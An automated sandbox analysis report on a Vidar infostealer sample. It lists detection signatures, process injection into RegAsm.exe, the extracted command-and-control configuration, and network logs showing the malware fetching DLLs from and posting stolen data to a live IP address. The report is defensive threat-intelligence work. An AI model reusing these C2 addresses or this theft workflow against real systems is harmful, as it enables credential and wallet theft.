Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1430555
MD5:	c7cb10eadcca31c88538f972fd657590
SHA1:	9b09cdc280601e63579ae2cb64d863a0419d971c
SHA256:	fabac53ffc7381edddcaddca2c9b2d647dd30a2e66d62c3cca720349f1e66d4e
Tags:	exe
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Yara detected AntiVM3

Yara detected Vidar

Yara detected Vidar stealer

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Country aware sample found (crashes after keyboard check)

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Searches for specific processes (likely to inject)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

JA3 SSL client fingerprint seen in connection with other malware

One or more processes crash

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 4092 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C7CB10EADCCA31C88538F972FD657590)

RegAsm.exe (PID: 2632 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 7144 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 356 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199677575543"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 4092	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 2632	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 2632	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 2632	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author
1.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.450000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Found malware configuration

Source: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199677575543"]}

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_004117A0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	1_2_004117A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00406F90 CryptUnprotectData,LocalAlloc,LocalFree,	1_2_00406F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00409330 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,	1_2_00409330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00406F10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	1_2_00406F10

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 23.47.27.74:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.244.99:443 -> 192.168.2.6:49701 version: TLS 1.2

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source:	Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source:	Binary string: nss3.pdb@ source: nss3.dll.1.dr, nss3[1].dll.1.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
Source:	Binary string: C:\5lpar31fck04x\Body.pdb source: file.exe
Source:	Binary string: nss3.pdb source: nss3.dll.1.dr, nss3[1].dll.1.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr
Source:	Binary string: mozglue.pdb source: mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004EDB23 FindFirstFileExW,	0_2_004EDB23
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004EE007 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_004EE007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0040B1B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	1_2_0040B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00401200 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	1_2_00401200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0040D4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_0040D4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00416740 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	1_2_00416740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00417800 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_00417800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00416F50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_00416F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_004173C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	1_2_004173C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0040A660 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0040AAE0 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040AAE0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_00416BB0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,

1_2_00416BB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199677575543

Source: global traffic

HTTP traffic detected: GET /profiles/76561199677575543 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDBUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKKFIJKFCAKJJJKJKFIUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEBFHCAKFBGDHIDHIDBUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDBUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Content-Length: 7797Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDGHIJDGCBAAAAAFIJDUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAECUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIIJJJKEGIDGCBAFIJUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFBGCGIJKJJKFIDBFCGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGIECGIEBKJJJJKEGHJUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCBKFBGIIIECAAAKFCUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Content-Length: 122813Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFBGCGIJKJJKFIDBFCGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBGDGIDBAAEBFHJKJDGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Content-Length: 331Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.244.99

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_00404490 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

1_2_00404490

Source: global traffic	HTTP traffic detected: GET /profiles/76561199677575543 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Cache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: steamcommunity.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDBUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Content-Length: 279Connection: Keep-AliveCache-Control: no-cache

Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
